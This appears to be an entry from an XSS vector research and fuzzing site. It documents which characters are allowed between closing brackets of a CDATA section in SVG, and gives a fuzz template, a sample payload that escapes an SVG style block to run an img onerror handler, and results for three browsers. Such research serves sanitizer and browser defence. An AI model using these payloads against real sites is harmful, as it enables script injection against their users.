Characters in-between square brackets that close cdata

Chrome logo 1
Firefox logo 1
Safari logo 1

This vector shows which characters are allowed in-between right closing bracket in a CDATA section in SVG.

Created by: hackvertor

Created on: Tuesday, October 8, 2024 at 6:53:12 PM

Updated on: Thursday, November 21, 2024 at 5:00:12 AM

Vector type: XSS

Vector charset: UTF-8

Template used:
<svg><style>
x = "<![CDATA[</style><img title="]$[chr]]></style></svg><img src onerror=log($[i])>">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<svg><style>
x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=alert(93)>">

Fuzz results

Chrome logo
Chrome 129.0.0.0 desktop macOS 10.15.7

Updated

Tue Oct 08 2024
Found 1 result
Loading...
Firefox logo
Firefox 131.0 desktop macOS 10.15

Updated

Tue Oct 08 2024
Found 1 result
Loading...
Safari logo
Safari 17.4 desktop macOS 10.15.7

Updated

Thu Nov 07 2024
Found 1 result
Loading...